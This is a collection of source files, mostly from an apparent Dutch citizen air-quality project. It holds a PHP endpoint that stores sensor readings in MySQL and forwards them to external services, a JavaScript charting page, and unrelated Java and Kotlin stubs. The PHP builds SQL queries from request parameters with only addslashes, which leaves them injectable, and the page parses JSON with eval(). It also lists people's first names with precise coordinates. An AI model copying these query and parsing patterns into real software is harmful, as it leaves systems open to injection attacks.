while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['co2']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'co2='.floatval($_REQUEST['co2']);
}
if(array_key_exists('temp', $_REQUEST)) {
echo 'Temperatuur '.htmlspecialchars(addslashes($_REQUEST['temp'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Temperatuur\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['temp']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'temperatuur='.floatval($_REQUEST['temp']);
}
if(array_key_exists('rh', $_REQUEST)) {
echo 'Relatieve vochtigheid '.htmlspecialchars(addslashes($_REQUEST['rh'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Relative vochtigheid\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['rh']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'vochtigheid='.floatval($_REQUEST['rh']);
}
if(array_key_exists('luchtdruk', $_REQUEST)) {
echo 'Luchtdruk '.htmlspecialchars(addslashes($_REQUEST['luchtdruk'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Luchtdruk\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['luchtdruk']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'luchtdruk='.floatval($_REQUEST['luchtdruk']);
}
if(array_key_exists('accu', $_REQUEST)) {
echo 'Accu '.htmlspecialchars(addslashes($_REQUEST['accu'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Batterij\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['accu']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'accu='.floatval($_REQUEST['accu']);
}
if(array_key_exists('di', $_REQUEST)) {
echo 'Digitaal in '.htmlspecialchars(addslashes($_REQUEST['di'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'<NAME>\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['di']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'di='.floatval($_REQUEST['di']);
}
if(array_key_exists('lux', $_REQUEST)) {
echo 'Lichtintensiteit '.htmlspecialchars(addslashes($_REQUEST['lux'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Lichtintensiteit\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['lux']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'lux='.floatval($_REQUEST['lux']);
}
if(array_key_exists('radio', $_REQUEST)) {
echo 'Radioactieve straling '.htmlspecialchars(addslashes($_REQUEST['radio'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Radio actieve straling\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['radio']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'radioactievestraling='.floatval($_REQUEST['radio']);
}
echo 'ok<br/>';
if($_REQUEST['id'] == 19) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'IndustrialItSDS011PM10 lat=52.184293,lon=5.943888';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-industrialit';
}
}
if($_REQUEST['id'] == 62) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'Flint lat=52.18295,lon=5.92980';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-flint';
}
}
if($_REQUEST['id'] == 64) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'IndustrialItBWestendorpstraat lat=52.20381,lon=5.94034';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-industrialit2';
}
}
if($_REQUEST['id'] == 65) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'GertUgchelen lat=52.18603,lon=5.94865';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-gert';
}
}
if($_REQUEST['id'] == 68) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'ArnoldK lat=52.22731,lon=5.98961';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-arnold';
}
}
if($_REQUEST['id'] == 69) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'GerardBeemteBroekland lat=52.25876,lon=6.02645';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-gerard';
}
}
if($_REQUEST['id'] == 71) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'Niels lat=52.23575,lon=5.95370';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-niels';
}
}
if($_REQUEST['id'] == 72) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'Johan lat=52.38935,lon=6.03010';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-johan';
}
}
if($_REQUEST['id'] == 75) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'PaJohan lat=52.03062,lon=5.57188';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-pajohan';
}
}
if($_REQUEST['id'] == 121) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'Daan lat=52.25667,lon=6.03867';
}
}
if($_REQUEST['id'] == 122) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'Frits lat=52.23330,lon=5.99250';
}
}
if($_REQUEST['id'] == 124) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'JeroenHendricksen lat=52.18349,lon=5.94239';
}
}
if($_REQUEST['id'] == 156) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'JelleJansen lat=52.29979,lon=5.04871';
}
}
if($sendToRIVM) {
$d = new DateTime();
$now = $d->format('Y-m-d\TH:i:s');
$d->sub(new DateInterval('PT59S'));
$minuteBefore = $d->format('Y-m-d\TH:i:s');
$data_string = 'm_fw,id='.$rivmSensorName.',timestamp_from="'.$minuteBefore.'Z",timestamp_to="'.$now.'Z",PM10='.str_replace(',','.',$pm10).',PM10-eenheid="ug/m3",PM10-meetopstelling="SDS011",PM2.5='.str_replace(',','.',$pm25).',PM2.5-meetopstelling="SDS011"';
$ch = curl_init('http://influx.rivm.nl:8086/write?db=fw');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_USERPWD, '<PASSWORD>');
curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
}
if($sendToLuftDaten) {
// luftdaten.info
$luftdatenData = '{"software_version": "1", "sensordatavalues":[{"value_type":"P1","value":"'.str_replace(',','.',$pm10).'"},{"value_type":"P2","value":"'.str_replace(',','.',$pm25).'"}]}';
$ch1 = curl_init('https://api.luftdaten.info/v1/push-sensor-data/');
curl_setopt($ch1, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch1, CURLOPT_POSTFIELDS, $luftdatenData);
curl_setopt($ch1, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch1, CURLOPT_HTTPHEADER, array('Content-Type: application/json',
'X-Pin: 1',
'X-Sensor: '.$luftdatenSensorName));
$resultLuftDaten = curl_exec($ch1);
logerror('JSON to LuftDaten ('.$luftdatenSensorName.'): '.$luftdatenData);
logerror('Result from LuftDaten: '.$resultLuftDaten);
}
insertIntoInflux($nodeName, $influxData);
exit();
}
die("No node found");
?><file_sep><html>
<head>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.0/jquery-ui.min.js"></script>
<link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.12.0/themes/smoothness/jquery-ui.css">
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
<script type="text/javascript" src="https://apeldoornindata.nl/js/datetimepicker/moment-with-locales.js"></script>
<script type="text/javascript" src="https://apeldoornindata.nl/js/datetimepicker/bootstrap-datetimepicker.js"></script>
<link href="https://apeldoornindata.nl/js/datetimepicker/bootstrap-datetimepicker.css" rel="stylesheet">
<script type="text/javascript">
var data;
var chart;
var options;
var chartwidth;
var chartareawith;
var liveUpdates = true;
var lastPoint = Math.floor(new Date().getTime() / 1000);
google.charts.load('current', {'packages':['corechart']});
google.charts.setOnLoadCallback(drawChart);
function drawChart() {
data = new google.visualization.DataTable();
data.addColumn('datetime', 'Time');
data.addColumn('number', 'Temperatuur 1');
chartwidth = $('#chart_div').width();
var leftmargin = 60;
chartareawith = chartwidth - leftmargin;
options = {
chartArea : { left: leftmargin, top:10, bottom: 50, width: chartareawith, height: '100%'},
vAxis: {format:'#.# C'},
legend: {position: 'none'},
hAxis: {
format: 'dd/MM/yyyy HH:mm',
}
};
chart = new google.visualization.LineChart(document.getElementById('chart_div'));
chart.draw(data, options);
refreshGraph();
function resizeChart () {
var container = document.getElementById("chart_div").firstChild.firstChild;
container.style.width = "100%";
var chart = new google.visualization.LineChart(document.getElementById('chart_div'));
chart.draw(data, options);
}
if (document.addEventListener) {
window.addEventListener('resize', resizeChart);
}
else if (document.attachEvent) {
window.attachEvent('onresize', resizeChart);
}
else {
window.resize = resizeChart;
}
}
function removeOldest() {
data.removeRow(data.getNumberOfRows()-1);
}
function addNewDataPoint(newValue) {
removeOldest();
var today = new Date();
var dd = today.getDate();
var mm = today.getMonth(); //January is 0!
var yyyy = today.getFullYear();
data.insertRows(0, [[new Date(yyyy, mm, dd, today.getHours(), today.getMinutes(), today.getSeconds()), newValue]]);
chart.draw(data, options);
}
function init() {
var graphPeriode = $("#graphperiode option:selected").val();
var jsonRows = $.ajax({
url: "https://apeldoornindata.nl/data.php/" + graphPeriode + "/" + lastPoint + "/" + chartareawith,
dataType: "json",
async: false
}).responseText;
// Create our data table out of JSON data loaded from server.
//url: "https://www.cloudscada.nl/nl/graphdata/tag/28/" + graphPeriode + "/" + lastPoint + "/" + chartareawith,
data.removeRows(0, data.getNumberOfRows());
data.insertRows(0, eval(jsonRows));
chart.draw(data, options);
}
function refreshGraph() {
var graphPeriode = $("#graphperiode option:selected").val();
var jsonRows = $.ajax({
url: "https://apeldoornindata.nl/data.php/" + graphPeriode + "/" + lastPoint + "/" + chartareawith,
dataType: "json",
async: false
}).responseText;
// Create our data table out of JSON data loaded from server.
//url: "https://www.cloudscada.nl/nl/graphdata/tag/28/" + graphPeriode + "/" + lastPoint + "/" + chartareawith,
data.removeRows(0, data.getNumberOfRows());
data.insertRows(0, eval(jsonRows));
chart.draw(data, options);
initDateTimePicker();
}
function previous() {
var graphPeriode = $("#graphperiode option:selected").val();
lastPoint = lastPoint - (graphPeriode * 60);
liveUpdates = false;
refreshGraph();
}
function next() {
var graphPeriode = $("#graphperiode option:selected").val();
lastPoint = lastPoint + (graphPeriode * 60);
if(lastPoint >= Math.floor(new Date().getTime() / 1000))
{
lastPoint = Math.floor(new Date().getTime() / 1000);
liveUpdates = true;
}
else
{
liveUpdates = false;
}
refreshGraph();
}
function updateLastPointAndRefreshGraph(lastPointPar) {
lastPoint = lastPointPar;
refreshGraph();
}
</script>
</head>
<body>
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="panel panel-default">
<div class="panel-heading">Grafiek - Temperatuur 1</div>
<div class="panel-body">
<div id="chart_div" style="width: 100%; height: 500px;"></div>
<div class="row">
<div class="col-sm-5">
<div class="dropdown">
<select class="form-control" name="graphperiode" id="graphperiode" onchange="refreshGraph()">
<option value="1">1 min</option>
<option value="5">5 min</option>
<option value="10">10 min</option>
<option value="30">30 min</option>
<option value="60">1 uur</option>
<option value="360">6 uur</option>
<option value="720" selected="selected">12 uur</option>
<option value="1440">1 dag</option>
<option value="2880">2 dagen</option>
<option value="10080">7 dagen</option>
</select>
</div>
</div>
<div class="col-sm-5">
<div class="form-group">
<div class="input-group date" id="datetimepicker1">
<input type="text" class="form-control" id="datetimepickerinp"/>
<span class="input-group-addon">
<span class="glyphicon glyphicon-calendar"></span>
</span>
</div>
</div>
<script type="text/javascript">
$(function () {
$("#datetimepicker1").datetimepicker({format: "DD-MM-YYYY HH:mm:ss", allowInputToggle: true, showTodayButton: true, showClose: true, maxDate: new Date(lastPoint * 1000), defaultDate: new Date((lastPoint - ($("#graphperiode option:selected").val() * 60)) * 1000)}).on('dp.change', function(e){
updateLastPoint(e.date.unix());
});
});
function initDateTimePicker() {
$("#datetimepickerinp").val(moment(new Date((lastPoint - ($("#graphperiode option:selected").val() * 60)) * 1000)).format('DD-MM-YYYY HH:mm:ss'));
}
function updateLastPoint(firstPoint) {
//alert("Lastoint: " + firstPoint + " + " + ($("#graphperiode option:selected").val() * 60));
var aap = firstPoint + ($("#graphperiode option:selected").val() * 60);
if(aap >= Math.floor(new Date().getTime() / 1000))
{
aap = Math.floor(new Date().getTime() / 1000);
liveUpdates = true;
}
else
{
liveUpdates = false;
}
updateLastPointAndRefreshGraph(aap);
}
</script>
</div>
<div class="col-sm-2 text-center">
<button type="button" class="btn btn-primary glyphicon glyphicon-backward" onclick="previous()"></button>
<button type="button" class="btn btn-primary glyphicon glyphicon-forward" onclick="next()"></button>
</div>
</div>
</div>
</div>
</div>
</div>
<?php
include('footer.php');
?>
</body>
</html>
|
4cd9c229a81858a993b8a44971719dfaf87c921f
|
[
"JavaScript",
"SQL",
"Markdown",
"PHP"
] | 34
|
PHP
|
TTNApeldoorn/ApeldoornInData
|
9053011360ddf95026c817504b395bb0d8cf92fb
|
e094afc6aff4168cf0fdac38c1956e8f5700750d
|
refs/heads/master
|
<repo_name>driatv/projetBanque<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/model/ClientModel.java
package com.adaming.myapp.model;
public class ClientModel {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/controller/ClientController.java
package com.adaming.myapp.controller;
public class ClientController {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/dao/IGroupeDao.java
package com.adaming.myapp.dao;
public interface IGroupeDao {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/services/IServiceGroupe.java
package com.adaming.myapp.services;
public interface IServiceGroupe {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/dao/EmployeDaoImpl.java
package com.adaming.myapp.dao;
public class EmployeDaoImpl implements IEmployeDao {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/entites/Compte.java
package com.adaming.myapp.entites;
public class Compte {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/controller/CompteController.java
package com.adaming.myapp.controller;
public class CompteController {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/dao/ICompteDao.java
package com.adaming.myapp.dao;
public interface ICompteDao {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/services/IServiceEmploye.java
package com.adaming.myapp.services;
public interface IServiceEmploye {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/services/ServiceGroupeImpl.java
package com.adaming.myapp.services;
public class ServiceGroupeImpl implements IServiceGroupe{
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/dao/GenericDaoImpl.java
package com.adaming.myapp.dao;
public class GenericDaoImpl extends GenericAbstractJPA implements IGenericDao {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/dao/IEmployeDao.java
package com.adaming.myapp.dao;
public interface IEmployeDao {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/model/EmployeModel.java
package com.adaming.myapp.model;
public class EmployeModel {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/services/IServiceCompte.java
package com.adaming.myapp.services;
public interface IServiceCompte {
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/dao/GroupeDaoImpl.java
package com.adaming.myapp.dao;
public class GroupeDaoImpl implements IGroupeDao{
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/services/ServiceClientImpl.java
package com.adaming.myapp.services;
public class ServiceClientImpl implements IServiceClient{
}
<file_sep>/ProjetBanque/src/main/java/com/adaming/myapp/entites/Client.java
package com.adaming.myapp.entites;
public class Client {
private String nom;
private String prenom;
}
|
7513bb1fe00b5d40682e0de945b49bf4c905841b
|
[
"Java"
] | 17
|
Java
|
driatv/projetBanque
|
bc2698d5ffdea3020e0e99afa4a2baf7c1ad2aba
|
cbfad6f9e40091585a039a43cbc0a844456d2f25
|
refs/heads/master
|
<repo_name>kentlow2002/acr<file_sep>/source/src/serverballistics.h
#include "ballistics.h"
<file_sep>/README.md
acr
===
AssaultCube Reloaded (first-person-shooter game)
<file_sep>/source/src/serverevents.h
// processing of server events
void processevent(client *c, explodeevent &e)
{
clientstate &gs = c->state;
switch(e.gun)
{
case GUN_GRENADE:
if(!gs.grenades.remove(e.id)) return;
break;
default:
return;
}
for(int i = 1; i<c->events.length() && c->events[i].type==GE_HIT; i++)
{
hitevent &h = c->events[i].hit;
if(!clients.inrange(h.target)) continue;
client *target = clients[h.target];
if(target->type==ST_EMPTY || target->state.state!=CS_ALIVE || h.lifesequence!=target->state.lifesequence || h.dist<0 || h.dist>EXPDAMRAD) continue;
int j = 1;
for(j = 1; j<i; j++) if(c->events[j].hit.target==h.target) break;
if(j<i) continue;
int damage = int(guns[e.gun].damage*(1-h.dist/EXPDAMRAD));
bool chk_gun = e.gun==GUN_GRENADE;
bool chk_dir = h.dir[0]+h.dir[1]+h.dir[2]==0;
bool chk_dst = h.dist < 2.0f;
bool chk_cnr = c->clientnum == target->clientnum;
if(chk_gun && chk_dir && chk_dst && chk_cnr) damage = INT_MAX; // nade suicide
serverdamage(target, c, damage, e.gun, true, h.dir);
}
}
void processevent(client *c, shotevent &e)
{
clientstate &gs = c->state;
int wait = e.millis - gs.lastshot;
if(!gs.isalive(gamemillis) ||
e.gun<GUN_KNIFE || e.gun>=NUMGUNS ||
wait<gs.gunwait[e.gun] ||
gs.mag[e.gun]<=0)
return;
if(e.gun!=GUN_KNIFE) gs.mag[e.gun]--;
loopi(NUMGUNS) if(gs.gunwait[i]) gs.gunwait[i] = max(gs.gunwait[i] - (e.millis-gs.lastshot), 0);
gs.lastshot = e.millis;
gs.gunwait[e.gun] = attackdelay(e.gun);
if(e.gun==GUN_PISTOL && gs.akimbomillis>gamemillis) gs.gunwait[e.gun] /= 2;
sendf(-1, 1, "ri6x", SV_SHOTFX, c->clientnum, e.gun,
// int(e.from[0]*DMF), int(e.from[1]*DMF), int(e.from[2]*DMF),
int(e.to[0]*DMF), int(e.to[1]*DMF), int(e.to[2]*DMF),
c->clientnum);
gs.shotdamage += guns[e.gun].damage*(e.gun==GUN_SHOTGUN ? SGMAXDMGLOC : 1); // 2011jan17:ft: so accuracy stays correct, since SNIPER:headshot also "exceeds expectations" we use SGMAXDMGLOC instead of SGMAXDMGABS!
switch(e.gun)
{
case GUN_GRENADE: gs.grenades.add(e.id); break;
default:
{
int totalrays = 0, maxrays = e.gun==GUN_SHOTGUN ? 3*SGRAYS: 1;
int tothits_c = 0, tothits_m = 0, tothits_o = 0; // sgrays
for(int i = 1; i<c->events.length() && c->events[i].type==GE_HIT; i++)
{
hitevent &h = c->events[i].hit;
if(!clients.inrange(h.target)) continue;
client *target = clients[h.target];
if(target->type==ST_EMPTY || target->state.state!=CS_ALIVE || h.lifesequence!=target->state.lifesequence) continue;
int rays = 1, damage = 0;
bool gib = false;
if(e.gun == GUN_SHOTGUN)
{
h.info = isbigendian() ? endianswap(h.info) : h.info;
int bonusdist = h.info&0xFF;
int numhits_c = (h.info & 0x0000FF00) >> 8, numhits_m = (h.info & 0x00FF0000) >> 16, numhits_o = (h.info & 0xFF000000) >> 24;
tothits_c += numhits_c; tothits_m += numhits_m; tothits_o += numhits_o;
rays = numhits_c + numhits_m + numhits_o;
if(rays < 1 || tothits_c > SGRAYS || tothits_m > SGRAYS || tothits_o > SGRAYS || bonusdist > SGDMGBONUS) continue;
gib = rays == maxrays;
float fdamage = (SGDMGTOTAL/(21*100.0f)) * (numhits_o * SGCOdmg/10.0f + numhits_m * SGCMdmg/10.0f + numhits_c * SGCCdmg/10.0f);
fdamage += (float)bonusdist;
damage = (int)ceil(fdamage);
#ifdef ACAC
if (!sg_engine(target, c, numhits_c, numhits_m, numhits_o, bonusdist)) continue;
#endif
}
else
{
damage = rays*guns[e.gun].damage;
gib = e.gun == GUN_KNIFE;
if(e.gun == GUN_SNIPER && h.info != 0)
{
gib = true;
damage *= 3;
}
}
totalrays += rays;
if(totalrays>maxrays) continue;
serverdamage(target, c, damage, e.gun, gib, h.dir);
}
break;
}
}
}
void processevent(client *c, reloadevent &e)
{
clientstate &gs = c->state;
if(!gs.isalive(gamemillis) ||
e.gun<GUN_KNIFE || e.gun>=NUMGUNS ||
!reloadable_gun(e.gun) ||
gs.ammo[e.gun]<=0)
return;
bool akimbo = e.gun==GUN_PISTOL && gs.akimbomillis>e.millis;
int mag = (akimbo ? 2 : 1) * magsize(e.gun), numbullets = min(gs.ammo[e.gun], mag - gs.mag[e.gun]);
if(numbullets<=0) return;
gs.mag[e.gun] += numbullets;
gs.ammo[e.gun] -= numbullets;
int wait = e.millis - gs.lastshot;
sendf(-1, 1, "ri3", SV_RELOAD, c->clientnum, e.gun);
if(gs.gunwait[e.gun] && wait<gs.gunwait[e.gun]) gs.gunwait[e.gun] += reloadtime(e.gun);
else
{
loopi(NUMGUNS) if(gs.gunwait[i]) gs.gunwait[i] = max(gs.gunwait[i] - (e.millis-gs.lastshot), 0);
gs.lastshot = e.millis;
gs.gunwait[e.gun] += reloadtime(e.gun);
}
}
void processevent(client *c, akimboevent &e)
{
clientstate &gs = c->state;
if(!gs.isalive(gamemillis) || gs.akimbomillis) return;
gs.akimbomillis = e.millis+30000;
}
void clearevent(client &c)
{
int n = 1;
while(n<c.events.length() && c.events[n].type==GE_HIT) n++;
c.events.remove(0, n);
}
void processevents()
{
loopv(clients)
{
client &c = *clients[i];
if(c.type==ST_EMPTY || !c.isauthed || team_isspect(c.team)) continue;
clientstate &cs = c.state;
/*
// game ending nuke...
if(cs.nukemillis && cs.nukemillis <= gamemillis && minremain)
{
// boom... gg
//forceintermission = true;
cs.nukemillis = 0;
sendf(-1, 1, "ri4", N_STREAKUSE, i, STREAK_NUKE, 0);
// apply the nuke effect
nuke(c);
}
*/
// drown, bleed, regen
if(cs.state == CS_ALIVE)
{
/*
// drown underwater
if(cs.o.z < smapstats.hdr.waterlevel)
{
if(cs.drownmillis <= 0)
{
if(cs.drownmillis) // resume partial drowning
cs.drownval = max(cs.drownval - ((servmillis + cs.drownmillis) / 1000), 0);
cs.drownmillis = gamemillis;
}
char drownstate = max(0, (gamemillis - cs.drownmillis) / 1000 - 10);
while(cs.drownval < drownstate)
{
++cs.drownval;
serverdamage(&c, &c, (m_classic(gamemode, mutators) ? 5 : (cs.drownval + 10)) * HEALTHSCALE, WEAP_MAX + 13, FRAG_NONE, cs.o);
if(cs.state != CS_ALIVE) break; // dead!
}
}
else if(cs.drownmillis > 0)
cs.drownmillis = -cs.drownmillis; // save partial drowning
// bleeding--oh no!
if(cs.wounds.length())
{
loopv(cs.wounds)
{
wound &w = cs.wounds[i];
if(!valid_client(w.inflictor)) cs.wounds.remove(i--);
else if(w.lastdealt + 500 < gamemillis)
{
client &owner = *clients[w.inflictor];
const int bleeddmg = (m_zombie(gamemode) ? BLEEDDMGZ : owner.state.perk2 == PERK_POWER ? BLEEDDMGPLUS : BLEEDDMG) * HEALTHSCALE;
owner.state.damage += bleeddmg;
owner.state.shotdamage += bleeddmg;
// where were we wounded?
vec woundloc = cs.o;
woundloc.add(w.offset);
// blood fx and stuff
sendhit(owner, WEAP_KNIFE, woundloc, bleeddmg);
// use wounded location as damage source
serverdamage(&c, &owner, bleeddmg, WEAP_KNIFE, FRAG_NONE, woundloc, c.state.o.dist(owner.state.o));
w.lastdealt = gamemillis;
}
}
}
// health regeneration
else if(m_regen(gamemode, mutators) && cs.state == CS_ALIVE && cs.health < STARTHEALTH && cs.lastregen + (cs.perk1 == PERK_POWER ? REGENINT * .7f : REGENINT) < gamemillis){
int amt = round_(float((STARTHEALTH - cs.health) / 5 + 15));
if(cs.perk1 == PERK_POWER) amt *= 1.4f;
if(amt >= STARTHEALTH - cs.health)
amt = STARTHEALTH - cs.health;
sendf(-1, 1, "ri3", N_REGEN, i, cs.health += amt);
cs.lastregen = gamemillis;
}
*/
}
// not alive: spawn queue
else if(/*cs.state == CS_WAITING ||*/ (c.type == ST_AI && valid_client(c.ownernum) && clients[c.ownernum]->isonrightmap && cs.state == CS_DEAD && cs.lastspawn<0))
{
const int waitremain = SPAWNDELAY - gamemillis + cs.lastdeath;
extern int canspawn(client *c);
if(canspawn(&c) == SP_OK && waitremain <= 0)
sendspawn(&c);
}
// akimbo out!
if(cs.akimbomillis && cs.akimbomillis < gamemillis) { cs.akimbomillis = 0; cs.akimbo = false; }
while(c.events.length())
{
gameevent &e = c.events[0];
{
if(e.shot.millis>gamemillis) break;
if(e.shot.millis<c.lastevent) { clearevent(c); continue; }
c.lastevent = e.shot.millis;
}
switch(e.type)
{
case GE_SHOT: processevent(&c, e.shot); break;
case GE_PROJ: processevent(&c, e.explode); break;
case GE_AKIMBO: processevent(&c, e.akimbo); break;
case GE_RELOAD: processevent(&c, e.reload); break;
}
clearevent(c);
}
}
}
|
6faa3e212fa3bb1ff406e77b437c98c882b4b19d
|
[
"Markdown",
"C"
] | 3
|
C
|
kentlow2002/acr
|
d43b08115e2e3df4961ac6df15405e633cfec163
|
949fb69177bc72ed8b8522169c14cd96008b8c95
|
refs/heads/main
|
<repo_name>svlilyas/testImage<file_sep>/app/src/main/java/com/mobilion/testimage/MainActivity.kt
package com.mobilion.testimage
import android.os.Bundle
import androidx.appcompat.app.AppCompatActivity
import androidx.databinding.DataBindingUtil
import com.google.android.material.tabs.TabLayoutMediator
import com.mobilion.testimage.adapter.TabPagerAdapter
import com.mobilion.testimage.databinding.ActivityMainBinding
class MainActivity : AppCompatActivity() {
private lateinit var binding: ActivityMainBinding
private lateinit var pagerAdapter: TabPagerAdapter
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
binding = DataBindingUtil.setContentView(
this, R.layout.activity_main
)
pagerAdapter = TabPagerAdapter(supportFragmentManager, lifecycle)
binding.viewPager.adapter = pagerAdapter
TabLayoutMediator(binding.mainTabLayout, binding.viewPager) { tab, position ->
when (position) {
0 -> {
tab.text = getString(R.string.trouble)
}
1 -> {
tab.text = getString(R.string.solution)
}
2 -> {
tab.text = getString(R.string.network)
}
3 -> {
tab.text = getString(R.string.card_image)
}
}
}.attach()
}
}
<file_sep>/settings.gradle
rootProject.name = "TestImage"
include ':app'
<file_sep>/app/src/main/java/com/mobilion/testimage/extensions/ImageExtensions.kt
package com.mobilion.testimage.extensions
import android.widget.ImageView
import androidx.databinding.BindingAdapter
import com.bumptech.glide.Glide
import com.santalu.aspectratioimageview.AspectRatioImageView
import com.squareup.picasso.Picasso
@BindingAdapter("app:imageUrl")
fun ImageView.loadImage(url: String?) {
if (!url.isNullOrEmpty()) {
Glide.with(this).load(url).into(this)
}
}
@BindingAdapter("app:imageUrlGlide")
fun AspectRatioImageView.loadImageGlide(url: String?) {
if (!url.isNullOrEmpty()) {
/*Glide.with(this).load(url).placeholder(R.drawable.bmw_front_1_1920x1080)
.error(R.drawable.ic_baseline_report_problem_24).into(this)
*/
Glide.with(this).load(url).into(this)
}
}
